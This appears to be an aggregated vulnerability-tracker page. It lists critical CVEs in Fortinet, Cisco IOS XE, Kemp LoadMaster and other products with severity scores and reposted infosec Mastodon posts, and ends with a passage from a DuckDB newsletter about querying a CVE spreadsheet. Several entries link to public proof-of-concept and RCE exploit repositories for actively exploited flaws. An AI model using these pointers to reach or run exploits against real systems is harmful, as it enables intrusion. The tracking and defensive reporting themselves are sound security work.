New blog post dives deep into a lesser-known macOS attack surface, revealing over 10 fresh sandbox escape vulnerabilities, including CVE-2023-27944, CVE-2023-32414, and CVE-2024-27864. The overlooked XPC services in system frameworks have opened up critical bypass paths for sandbox and SIP restrictions.

jhftss.github.io/A-New-Era-of-

#macOS #Infosec #SandboxEscape #CVE

##

CVE-2023-27997
(9.8 CRITICAL)

EPSS: 9.72%

updated 2024-04-04T04:45:33

2 posts

A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically c

9 repos

https://github.com/imbas007/CVE-2023-27997-Check

https://github.com/TechinsightsPro/ShodanFortiOS

https://github.com/Cyb3rEnthusiast/CVE-2023-27997

https://github.com/rio128128/CVE-2023-27997-POC

https://github.com/puckiestyle/cve-2023-27997

https://github.com/node011/CVE-2023-27997-POC

https://github.com/delsploit/CVE-2023-27997

https://github.com/BishopFox/CVE-2023-27997-check

https://github.com/lexfo/xortigate-cve-2023-27997

screaminggoat at 2024-11-19T15:17:16.761Z ##

Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)

##

screaminggoat@infosec.exchange at 2024-11-19T15:17:16.000Z ##

Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)

#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI

##

CVE-2024-20767
(8.2 HIGH)

EPSS: 11.07%

updated 2024-03-18T12:31:54

2 posts

ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.

1 repos

#search_error

CVE-2023-36328
(9.8 CRITICAL)

EPSS: 0.16%

updated 2024-03-07T18:30:26

1 posts

Integer Overflow vulnerability in mp_grow in libtom libtommath before commit beba892bc0d4e4ded4d667ab1d2a94f4d75109a9, allows attackers to execute arbitrary code and cause a denial of service (DoS).

cR0w@infosec.exchange at 2024-11-15T19:01:00.000Z ##

So AIX 7.2 and 7.3 are vulnerable to CVE-2023-36328 in tcl, a CVSSv3 9.8 RCE per IBM that was initially published over a year ago, and the bulletin didn't come out from IBM until last week? ibm.com/support/pages/security

##

CVE-2024-1212
(10.0 CRITICAL)

EPSS: 91.88%

updated 2024-02-21T18:31:06

4 posts

Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.

Nuclei template

1 repos

#search_error

oversecurity@mastodon.social at 2024-11-19T09:10:08.000Z ##

CISA Adds Three Critical Vulnerabilities to the Known Exploited Vulnerabilities Catalog

: CISA adds CVE-2024-1212, CVE-2024-0012, and CVE-2024-9474 to the Known Exploited Vulnerabilities Catalog (KEV).

🔗️ [Cyble] link.is.it/so5jib

##

AAKL@infosec.exchange at 2024-11-18T20:25:29.000Z ##

#CISA has updated the KEV catalogue:

CVE-2024-1212: Progress Kemp LoadMaster OS Command Injection Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-0012: Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-9474: Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability cve.org/CVERecord?id=CVE-2024- @cisacyber #cybersecurity #infosec #PaloAlto

##

cisakevtracker@mastodon.social at 2024-11-18T20:01:21.000Z ##

CVE ID: CVE-2024-1212
Vendor: Progress
Product: Kemp LoadMaster
Date Added: 2024-11-18
Vulnerability: Progress Kemp LoadMaster OS Command Injection Vulnerability
Notes: community.progress.com/s/artic ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-18T19:18:33.000Z ##

CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!

  • CVE-2024-0012 (CVSSv4: 9.3 critical) Palo Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
  • CVE-2024-9474 (CVSSv4: 6.9 medium) Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
  • CVE-2024-1212 (perfect 10.0 🥳) Progress Kemp LoadMaster OS Command Injection Vulnerability

#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster

##

CVE-2024-23113
(9.8 CRITICAL)

EPSS: 1.84%

updated 2024-02-15T15:30:37

5 posts

A use of externally-controlled format string in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, FortiPAM versions 1.2.0, 1.1.0 through 1.1.2, 1.0.0 through 1.0.3, FortiSwitchManager versions 7.2.0 through 7.2.3, 7.0.0 through 7.0.3 allows attacker to execute unauthorized co

8 repos

https://github.com/expl0itsecurity/CVE-2024-23113

https://github.com/maybelookis/CVE-2024-23113

https://github.com/CheckCve2/CVE-2024-23113

https://github.com/HazeLook/CVE-2024-23113

https://github.com/OxLmahdi/cve-2024-23113

https://github.com/p33d/CVE-2024-23113

https://github.com/puckiestyle/CVE-2024-23113

https://github.com/groshi/CVE-2024-23113-Private-POC

inw@mastodon.social at 2024-11-20T16:57:35.000Z ##

What a wonderful writeup of the #fortinet vulnerabilities found by watchtowr labs. It's insightful and entertaining :) #cybersecurity #security #infosec

labs.watchtowr.com/hop-skip-fo

##

jkmcnk@mastodon.social at 2024-11-14T22:59:38.000Z ##

lol, at this point you should just throw your fortinet devices into a landfill. labs.watchtowr.com/hop-skip-fo

##

GossiTheDog@cyberplace.social at 2024-11-14T22:30:31.000Z ##

FortiJump Higher details are out. Even with the patch installed, apparently you can get RCE on FortiManager using a FortiGate it manages. labs.watchtowr.com/hop-skip-fo

##

AAKL@infosec.exchange at 2024-11-14T16:57:29.000Z ##

WatchTowr: Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575 labs.watchtowr.com/hop-skip-fo #cybersecurity #infosec #Fortinet

##

screaminggoat@infosec.exchange at 2024-11-14T16:47:12.000Z ##

watchTowr: Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575
Reference: CVE-2024-47575 (9.8 critical, disclosed 23 October 2024 by Fortinet, noted earlier on 13 October by @GossiTheDog on Mastodon, added to CISA KEV Catalog 23 October, reported by Mandiant to be #eitw since June) Fortinet FortiManager Missing Authentication Vulnerability

watchTowr is disclosing a separate and unidentified privilege escalation vulnerability linked to CVE-2024-47575 due to the original #FortiJump vulnerability currently being under mass exploitation. They also warn that the published IoC, while helpful, may not cover all attacks: an unregistered device being added to the system, could be easily bypassed, and exploitation could occur without generating any log noise at all.

  • This implies that Fortinet have simply patched the wrong code, in the wrong file, in an entirely different library.
  • While we generally try to resist speculation on the internals of vendor’s development teams, it is very alarming that Fortinet appears to have botched this patch so badly (in our opinion). They have (in our opinion), in essence, patched the wrong code, leaving device administrators with a false sense of security.

#CVE_2024_47575 #vulnerability #fortinet #CVE #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI

##

CVE-2023-20198
(10.0 CRITICAL)

EPSS: 88.58%

updated 2024-02-03T05:07:29

2 posts

Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system. For s

Nuclei template

30 repos

https://github.com/W01fh4cker/CVE-2023-20198-RCE

https://github.com/emomeni/Simple-Ansible-for-CVE-2023-20198

https://github.com/codeb0ss/CVE-2023-20198-PoC

https://github.com/JoyGhoshs/CVE-2023-20198

https://github.com/raystr-atearedteam/CVE-2023-20198-checker

https://github.com/Shadow0ps/CVE-2023-20198-Scanner

https://github.com/iveresk/cve-2023-20198

https://github.com/netbell/CVE-2023-20198-Fix

https://github.com/ohlawd/CVE-2023-20198

https://github.com/fox-it/cisco-ios-xe-implant-detection

https://github.com/Tounsi007/CVE-2023-20198

https://github.com/AhmedMansour93/Event-ID-193-Rule-Name-SOC231-Cisco-IOS-XE-Web-UI-ZeroDay-CVE-2023-20198-

https://github.com/sanan2004/CVE-2023-20198

https://github.com/reket99/Cisco_CVE-2023-20198

https://github.com/ZephrFish/CVE-2023-20198-Checker

https://github.com/alekos3/CVE_2023_20198_Detector

https://github.com/mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner

https://github.com/Vulnmachines/Cisco_CVE-2023-20198

https://github.com/hackingyseguridad/nmap

https://github.com/vulncheck-oss/cisco-ios-xe-implant-scanner

https://github.com/sohaibeb/CVE-2023-20198

https://github.com/smokeintheshell/CVE-2023-20198

https://github.com/securityphoenix/cisco-CVE-2023-20198-tester

https://github.com/alekos3/CVE_2023_20198_Remediator

https://github.com/IceBreakerCode/CVE-2023-20198

https://github.com/kacem-expereo/CVE-2023-20198

https://github.com/RevoltSecurities/CVE-2023-20198

https://github.com/Codeb3af/CVE-2023-20198-RCE

https://github.com/Atea-Redteam/CVE-2023-20198

https://github.com/Pushkarup/CVE-2023-20198

screaminggoat at 2024-11-18T14:12:26.266Z ##

Trend Micro: Inside Water Barghest's Rapid Exploit-to-Market Strategy for IoT Devices
Trend Micro does a piss poor job of providing useful threat intelligence in this article. Water Barghest is supposedly a financially-motivated APT without a country attribution that's been active since 2018. They also say that Water Barghest exploits vulnerabilities without once identifying a CVE ID. Over 20,000 Internet of Things (IoT) devices are part of a proxy botnet, using Ngioweb malware to connect to C2 servers. They also assess that Water Barghest is the threat actor that massively exploited Cisco IOS XE as a zero-day. It's not explicitly stated (since Trend Micro didn't include any CVE IDs) but it's assumed to be both CVE-2023-20198 and CVE-2023-20273 because they were chained together. Indicators of compromise and Yara rules provided.

##

screaminggoat@infosec.exchange at 2024-11-18T14:12:26.000Z ##

Trend Micro: Inside Water Barghest's Rapid Exploit-to-Market Strategy for IoT Devices
Trend Micro does a piss poor job of providing useful threat intelligence in this article. Water Barghest is supposedly a financially-motivated APT without a country attribution that's been active since 2018. They also say that Water Barghest exploits vulnerabilities without once identifying a CVE ID. Over 20,000 Internet of Things (IoT) devices are part of a proxy botnet, using Ngioweb malware to connect to C2 servers. They also assess that Water Barghest is the threat actor that massively exploited Cisco IOS XE as a zero-day. It's not explicitly stated (since Trend Micro didn't include any CVE IDs) but it's assumed to be both CVE-2023-20198 and CVE-2023-20273 because they were chained together. Indicators of compromise and Yara rules provided.

#WaterBarghest #IOC #yara #CVE_2023_20198 #CVE_2023_20273 #zeroday #iot #ngioweb #botnet #cybercrime #proxybotnet #vulnerability #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec

##

CVE-2023-20273
(7.2 HIGH)

EPSS: 7.47%

updated 2024-02-03T05:06:23

2 posts

A vulnerability in the web UI feature of Cisco IOS XE Software could allow an authenticated, remote attacker to inject commands with the privileges of root. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted input to the web UI. A successful exploit could allow the attacker to inject commands to the underlying operating sys

3 repos

https://github.com/smokeintheshell/CVE-2023-20273

https://github.com/Shadow0ps/CVE-2023-20198-Scanner

https://github.com/fox-it/cisco-ios-xe-implant-detection

screaminggoat at 2024-11-18T14:12:26.266Z ##

Trend Micro: Inside Water Barghest's Rapid Exploit-to-Market Strategy for IoT Devices
Trend Micro does a piss poor job of providing useful threat intelligence in this article. Water Barghest is supposedly a financially-motivated APT without a country attribution that's been active since 2018. They also say that Water Barghest exploits vulnerabilities without once identifying a CVE ID. Over 20,000 Internet of Things (IoT) devices are part of a proxy botnet, using Ngioweb malware to connect to C2 servers. They also assess that Water Barghest is the threat actor that massively exploited Cisco IOS XE as a zero-day. It's not explicitly stated (since Trend Micro didn't include any CVE IDs) but it's assumed to be both CVE-2023-20198 and CVE-2023-20273 because they were chained together. Indicators of compromise and Yara rules provided.

##

screaminggoat@infosec.exchange at 2024-11-18T14:12:26.000Z ##

Trend Micro: Inside Water Barghest's Rapid Exploit-to-Market Strategy for IoT Devices
Trend Micro does a piss poor job of providing useful threat intelligence in this article. Water Barghest is supposedly a financially-motivated APT without a country attribution that's been active since 2018. They also say that Water Barghest exploits vulnerabilities without once identifying a CVE ID. Over 20,000 Internet of Things (IoT) devices are part of a proxy botnet, using Ngioweb malware to connect to C2 servers. They also assess that Water Barghest is the threat actor that massively exploited Cisco IOS XE as a zero-day. It's not explicitly stated (since Trend Micro didn't include any CVE IDs) but it's assumed to be both CVE-2023-20198 and CVE-2023-20273 because they were chained together. Indicators of compromise and Yara rules provided.

#WaterBarghest #IOC #yara #CVE_2023_20198 #CVE_2023_20273 #zeroday #iot #ngioweb #botnet #cybercrime #proxybotnet #vulnerability #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec

##

CVE-2020-3259
(7.5 HIGH)

EPSS: 2.71%

updated 2023-08-16T18:30:19

1 posts

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to retrieve memory contents on an affected device, which could lead to the disclosure of confidential information. The vulnerability is due to a buffer tracking issue when the software parses invalid URLs

CVE-2021-40539
(9.8 CRITICAL)

EPSS: 97.47%

updated 2023-08-08T15:31:21

2 posts

Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.

Nuclei template

5 repos

https://github.com/lpyydxs/CVE-2021-40539

https://github.com/lpyzds/CVE-2021-40539

https://github.com/Bu0uCat/ADSelfService-Plus-RCE-CVE-2021-40539

https://github.com/DarkSprings/CVE-2021-40539

https://github.com/synacktiv/CVE-2021-40539

screaminggoat at 2024-11-19T15:17:16.761Z ##

Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)

##

screaminggoat@infosec.exchange at 2024-11-19T15:17:16.000Z ##

Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)

#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI

##

screaminggoat@infosec.exchange at 2024-11-07T18:12:59.000Z ##

CVE-2021-4043 (5.5 medium) Motion Spell GPAC Null Pointer Dereference Vulnerability is no longer on the KEV Catalog.

#cisa #kev #vulnerability #cisakev

##

hrbrmstr@mastodon.social at 2024-11-07T16:43:45.000Z ##

We (GreyNoise) have coverage for 3 of the 4 CVEs into today's CISA KEV Drop:

- ✅ CVE-2019-16278
- ✅ CVE-2024-51567
- ✅ CVE-2024-5910
- ❌ CVE-2024-43093

Hit up viz.greynoise.io for deets + real/useful/timely blocklists.

CVE-2024-43093 is client-side, hence no coverage.

##

cisakevtracker@mastodon.social at 2024-11-07T16:00:52.000Z ##

CVE ID: CVE-2019-16278
Vendor: Nostromo
Product: nhttpd
Date Added: 2024-11-07
Vulnerability: Nostromo nhttpd Directory Traversal Vulnerability
Notes: nazgul.ch/dev/nostromo_cl.txt ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-07T15:35:09.000Z ##

CISA: CISA Adds Four Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-5910 (9.3 critical) Palo Alto Expedition Missing Authentication Vulnerability
  • CVE-2024-43093 (high) Android Framework Privilege Escalation Vulnerability
  • CVE-2024-51567 (10.0 critical 🥳) CyberPanel Incorrect Default Permissions Vulnerability
  • CVE-2019-16278 (9.8 critical) Nostromo nhttpd Directory Traversal Vulnerability

#cisa #cisakev #kev #vulnerability #CVE #CVE_2024_5910 #CVE_2024_43093 #CVE_2024_51567 #CVE_2019_16278 #infosec #cybersecurity

##

CVE-2022-42475
(9.8 CRITICAL)

EPSS: 27.42%

updated 2023-02-02T05:01:14

2 posts

A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.

7 repos

https://github.com/3yujw7njai/CVE-2022-42475-RCE-POC

https://github.com/0xhaggis/CVE-2022-42475

https://github.com/Amir-hy/cve-2022-42475

https://github.com/scrt/cve-2022-42475

https://github.com/natceil/cve-2022-42475

https://github.com/Mustafa1986/cve-2022-42475-Fortinet

https://github.com/bryanster/ioc-cve-2022-42475

screaminggoat at 2024-11-19T15:17:16.761Z ##

Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)

##

screaminggoat@infosec.exchange at 2024-11-19T15:17:16.000Z ##

Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)

#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI

##

CVE-2021-27860
(8.8 HIGH)

EPSS: 28.52%

updated 2023-02-01T05:06:42

2 posts

A vulnerability in the web management interface of FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p92 and 10.2.2r44p1 could allow a remote, unauthenticated attacker to upload a file to any location on the filesystem. The FatPipe advisory identifier for this vulnerability is FPSA006.

screaminggoat at 2024-11-19T15:17:16.761Z ##

Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)

##

screaminggoat@infosec.exchange at 2024-11-19T15:17:16.000Z ##

Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)

#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI

##

CVE-2021-26086
(5.3 MEDIUM)

EPSS: 97.11%

updated 2023-01-30T05:01:33

2 posts

Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.

2 repos

https://github.com/ColdFusionX/CVE-2021-26086

https://github.com/Jeromeyoung/CVE-2021-26086

cisakevtracker@mastodon.social at 2024-11-12T19:00:54.000Z ##

CVE ID: CVE-2021-26086
Vendor: Atlassian
Product: Jira Server and Data Center
Date Added: 2024-11-12
Vulnerability: Atlassian Jira Server and Data Center Path Traversal Vulnerability
Notes: jira.atlassian.com/browse/JRAS ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-12T18:39:59.000Z ##

CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability
  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability
  • CVE-2021-41277 (perfect 10.0 🥳) Metabase GeoJSON API Local File Inclusion Vulnerability
  • CVE-2014-2120 (CVSSv2: 4.3 medium) Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability
  • CVE-2021-26086 (5.3 medium) Atlassian Jira Server and Data Center Path Traversal Vulnerability

#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity

##

CVE-2019-12900
(9.8 CRITICAL)

EPSS: 1.96%

updated 2023-01-27T05:02:50

1 posts

BZ2_decompress in decompress.c in bzip2 through 1.0.6 has an out-of-bounds write when there are many selectors.

CVE-2020-12271
(9.8 CRITICAL)

EPSS: 1.67%

updated 2023-01-27T05:02:29

1 posts

A SQL injection issue was found in SFOS 17.0, 17.1, 17.5, and 18.0 before 2020-04-25 on Sophos XG Firewall devices, as exploited in the wild in April 2020. This affected devices configured with either the administration (HTTPS) service or the User Portal exposed on the WAN zone. A successful attack may have caused remote code execution that exfiltrated usernames and hashed passwords for the local

1 repos

#search_error

dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev at 2024-11-09T14:11:00.000Z ##

Quacking In The [g]Sheets; My🦆Server; Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)

My day outside of Reno started early, Friday, and we were chased by black helicopters (not joking), so — as expected — no Friday normal Drop.

But things are QUACKING in DuckDB land, and I just had to get a Bonus 🦆 Drop out about them before more hiking this weekend.

Subscribe

TL;DR

(This is an AI-generated summary of today’s Drop using Ollama + llama 3.2 and a custom Modelfile.)

  • DuckDB GSheets extension enables direct integration with Google Sheets for reading and writing data through SQL, featuring OAuth authentication and basic query syntax (https://duckdb-gsheets.com/)
  • MyDuck Server bridges MySQL and DuckDB by providing MySQL-compatible interface while storing data in DuckDB’s OLAP format, offering significant performance improvements (https://github.com/apecloud/myduckserver)
  • DuckDB HTTP Client extension allows direct HTTP GET/POST requests within DuckDB queries, enabling integration with web APIs and immediate processing of response data (https://github.com/quackscience/duckdb-extension-httpclient)

Quacking In The [g]Sheets

The DuckDB GSheets extension (GH) enables seamless integration between DuckDB’s analytical capabilities and Google Sheets, bridging a critical gap between collaborative spreadsheet workflows and robust data analysis.

The extension provides straightforward (though fairly basic, for now) SQL syntax for both reading and writing Google Sheets data. You can query sheets using either full URLs or spreadsheet IDs, with options to specify sheet names and handle header rows. Authentication can be handled through browser-based OAuth or via Google API access tokens.

If you work in an environment where domain experts collaborate with datascience/analysis teams, Google Sheets (et al.) often serves as an accessible interface for non-technical team members to maintain and update data that feeds into analytical workflows. For example, product managers can maintain feature flags, marketing teams can update campaign metadata, and operations teams can manage configuration data – all through the familiar spreadsheet interface rather than dealing with JSON, YAML, or raw text files.

Setting up the extension requires installing it from the community repository (you need to be on a fairly recent release of DuckDb for this to work):

INSTALL gsheets FROM community;LOAD gsheets;

Basic usage patterns include:

-- Read from a sheetFROM read_gsheet('spreadsheet_url_or_id');-- Write to a sheetCOPY table_name TO 'spreadsheet_url_or_id' (FORMAT gsheet);

The section header image is from this gsheet which is (my public copy of) a “Database of network device CVEs” provided by Sophos from a five-year massively cool (but evil) hack of dozens of corporations around the globe. It is possible this sheet might be updated regularly, especially the “GreyNoise (#of Malicious IPs Scanning)” column (that’s my $WORK place). If that is the case it may make more sense to access it directly than to have some process to download it somewhere regularly.

I made a perma-copy of my OAuth’d access token:

LOAD gsheets;CREATE PERSISTENT SECRET (  TYPE gsheet,   PROVIDER access_token,   TOKEN 'yOUrToK3nH3re');

And, now we can look at the “schema”:

$ duckdb -json -c "  LOAD gsheets;   FROM read_gsheet(    'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',     sheet = 'Sheet1'  )   LIMIT 1" | jq[  {    "Vendor": "Sophos",    "Title": "Sophos SFOS SQL Injection Vulnerability",    "CVE": "CVE-2020-12271",    "CVSS": 9.8,    "Date of NVD publication": "4/27/20",    "Date of vendor advisory": "Unknown",    "Used in ransomware attacks?": "Known",    "Summary": "Sophos Firewall operating system (SFOS) firmware contains a SQL injection vulnerability when configured with either the administration (HTTPS) service or the User Portal is exposed on the WAN zone. Successful exploitation may cause remote code execution to exfiltrate usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords).",    "Date added to KEV Catalog": "11/3/21",    "Vendor Advisory": "https://community.sophos.com/kb/en-us/135412",    "Date of Known Exploitation": "Apr-20",    "Threat actor": "Unknown",    "Targets": "Telecommunication,Construction,Transportation,Education,Manufacturing,Auto,Airline,Pharmaceuticals,Retail,Insurance,Legal",    "Metasploit Module": "N",    "GreyNoise (#of Malicious IPs Scanning)": 0.0,    "Number of vulnerable devices": "?",    "Number of impacted devices": "?",    "GreyNoise Link": "https://viz.greynoise.io/query/%0A%20%20CVE-2020-12271"  }]

And, perform normal ops on it:

$ duckdb -table -c "LOAD gsheets;FROM read_gsheet(  'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',  sheet='Sheet1')SELECT  Vendor,  COUNT(Vendor) AS ctGROUP BY  VendorORDER BY  2 DESC"+---------------------+----+|       Vendor        | ct |+---------------------+----+| Cisco               | 72 || D-Link              | 19 || Ivanti              | 18 || Citrix              | 16 || Fortinet            | 13 || SonicWall           | 10 || Zyxel               | 9  || NETGEAR             | 8  || Juniper             | 6  || F5                  | 6  || PANW                | 5  || Sophos              | 5  || DrayTek             | 3  || Tenda               | 3  || TP-Link             | 2  || MikroTik            | 2  || Dasan               | 2  || Check Point         | 1  || D-Link and TRENDnet | 1  || Barracuda           | 1  || Netis               | 1  || FatPipe             | 1  || Arcadyan            | 1  || Sumavision          | 1  |+---------------------+----+

The extension has some notable constraints to consider:

  • Google Sheets’ 1M cell limit per spreadsheet
  • Data must start in cell A1
  • Sheets must exist before writing to them

These limitations aside, the DuckDB GSheets extension will will (eventually) provide a robust bridge between collaborative data maintenance and analytical processing, making it easier for organizations to maintain their data workflows across technical and non-technical team members.

The code is very readable, but the extension is also a tad buggy at the moment (you may not always be able to get to a particular sheet, I have not debugged why, yet); so, this might be a good project to PR into if you have some specific functionality you need, but is presently missing, like support for a subset of the bonkers number of parameters you can use when reading CSV files in DuckDB.

My🦆Server

